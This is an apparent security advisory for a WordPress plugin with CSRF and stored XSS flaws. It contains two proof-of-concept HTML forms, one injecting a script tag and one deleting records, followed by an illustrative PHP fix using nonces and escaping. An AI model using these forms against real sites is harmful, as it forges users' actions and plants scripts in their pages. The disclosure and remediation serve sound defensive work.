CVSS3: 5.4 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

The plugin does not have CSRF checks in its AJAX actions, allowing attackers to make a logged-in user with a role as low as contributor add, edit and delete students via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping, this could also lead to Stored Cross-Site Scripting.

<!-- Add action: the rid field is stored and later rendered without escaping -->
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?action=ssr_add_st_submit" method="POST">
      <input type="hidden" name="rid" value='<script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!-- Delete action: <RID> is a placeholder for the record to delete -->
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?action=ssr_del_st_submit" method="POST">
      <input type="hidden" name="postID" value="<RID>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
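
The checks whose absence is described above, as an added example in the shape a fixed handler could take (this is not the plugin's own code). It assumes the two actions are wired through WordPress's `admin_action_{action}` hook; the `ssr_example_*` functions, the `ssr_nonce` field, the nonce action strings, the `edit_posts` capability and the `ssr_example_students` option are hypothetical names chosen for illustration.

```php
<?php
// Added example, not the plugin's code. Assumed names: ssr_example_* helpers,
// the 'ssr_nonce' field, the nonce action strings, the 'edit_posts' capability
// and the 'ssr_example_students' option used as stand-in storage.

// Gate shared by both handlers: capability first, then nonce.
function ssr_example_guard( $nonce_action ) {
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    // Dies unless $_REQUEST['ssr_nonce'] is a valid nonce for this user and
    // action, so a cross-site form that cannot read the nonce is rejected.
    check_admin_referer( $nonce_action, 'ssr_nonce' );
}

// Read one POST field as plain text: unslash, then strip tags and line breaks.
function ssr_example_field( $key ) {
    return isset( $_POST[ $key ] ) ? sanitize_text_field( wp_unslash( $_POST[ $key ] ) ) : '';
}

add_action( 'admin_action_ssr_add_st_submit', function () {
    ssr_example_guard( 'ssr_add_st' );
    $rid = ssr_example_field( 'rid' );
    if ( '' === $rid ) {
        wp_die( 'Missing rid', '', array( 'response' => 400 ) );
    }
    $rows   = (array) get_option( 'ssr_example_students', array() );
    $rows[] = $rid;
    update_option( 'ssr_example_students', $rows );
} );

add_action( 'admin_action_ssr_del_st_submit', function () {
    ssr_example_guard( 'ssr_del_st' );
    $id   = ssr_example_field( 'postID' );
    $rows = (array) get_option( 'ssr_example_students', array() );
    update_option( 'ssr_example_students', array_values( array_diff( $rows, array( $id ) ) ) );
} );

// Form side: emit the nonce the add handler expects.
function ssr_example_add_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?action=ssr_add_st_submit' ) ) . '">';
    wp_nonce_field( 'ssr_add_st', 'ssr_nonce' );
    echo '<input name="rid" /><input type="submit" value="Add" /></form>';
}

// Output side: escape at render time even though input was sanitized.
function ssr_example_render_rows() {
    foreach ( (array) get_option( 'ssr_example_students', array() ) as $rid ) {
        echo '<li>' . esc_html( $rid ) . '</li>';
    }
}
```

With these checks in place, both forms shown above fail at `check_admin_referer()` because they carry no nonce, and a `rid` containing markup is stripped on input and escaped again on output.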